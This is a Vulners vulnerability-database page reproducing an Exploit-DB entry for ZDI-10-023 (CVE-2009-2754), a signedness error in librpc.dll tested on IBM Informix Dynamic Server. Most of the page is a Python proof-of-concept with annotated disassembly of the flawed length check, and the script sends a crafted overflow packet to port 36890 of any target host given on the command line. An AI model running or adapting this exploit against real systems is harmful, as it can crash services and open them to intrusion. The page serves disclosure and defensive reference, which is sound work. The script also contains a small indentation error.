Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution

🗓️ 08 Apr 2010 00:00:00Reported by ZSploit.comType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 39 Views

Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vuln
8 Apr 201000:00
zdt
Circl		CVE-2009-2754
8 Apr 201000:00
circl
Check Point Advisories		Preemptive Protection against Multiple Vendors librpc.dll Stack Buffer Overflow
23 Apr 201000:00
checkpoint_advisories
Check Point Advisories		Multiple Vendors RPC librpc.dll Stack Buffer Overflow (CVE-2009-2754)
17 May 201000:00
checkpoint_advisories
Check Point Advisories		Update Protection against Multiple Vendors librpc.dll Stack Buffer Overflow
28 Feb 201100:00
checkpoint_advisories
CVE		CVE-2009-2754
5 Mar 201016:00
cve
Cvelist		CVE-2009-2754
5 Mar 201016:00
cvelist
exploitpack		Multiple Vendor librpc.dll Signedness Error - Remote Code Execution
8 Apr 201000:00
exploitpack
NVD		CVE-2009-2754
5 Mar 201016:30
nvd
Packet Storm		librpc.dll Signedness Error Remote Code Execution
9 Apr 201000:00
packetstorm
Rows per page
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754

#! /usr/bin/env python
###############################################################################
## File       :  zs_ids_rpc.py
## Description:
##            :
## Created_On :  Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():

.text:1000B8E1                 mov     [ebp+0], eax
.text:1000B8E4                 mov     eax, [ebx]
.text:1000B8E6                 push    eax             ; netlong
.text:1000B8E7                 add     ebx, 4
.text:1000B8EA                 call    esi ; ntohl    ; Get length of hostname
.text:1000B8EC                 cmp     eax, 0FFh    ; Signedness error, if we give 0xffffffff(-1) will pass this check
.text:1000B8F1                 jle     short loc_1000B8FD
.text:1000B8F3                 mov     esi, 1
.text:1000B8F8                 jmp     loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD:                           ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD                 mov     edi, [ebp+4]
.text:1000B900                 mov     ecx, eax
.text:1000B902                 mov     edx, ecx
.text:1000B904                 mov     esi, ebx
.text:1000B906                 shr     ecx, 2
.text:1000B909                 rep movsd        ; call memcpy here with user-supplied size cause a stack overflow
.text:1000B90B                 mov     ecx, edx
.text:1000B90D                 add     eax, 3
.text:1000B910                 and     ecx, 3
.text:1000B913                 rep movsb
"""

import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)


data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
    "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
    "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
    "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
    "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
    "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
    "\x00\x00\x00\x00\x00\x00\x00\x00"

host = sys.argv[1]
port = 36890

print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
    s.connect((host, port))
        s.send(data)
        print "Sending payload .."
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"

The ZSploit Team
http://zsploit.com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Apr 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 210
EPSS0.54889
remote code executionlibrpc.dllvulnerabilityzdi-10-023zsploit.com
39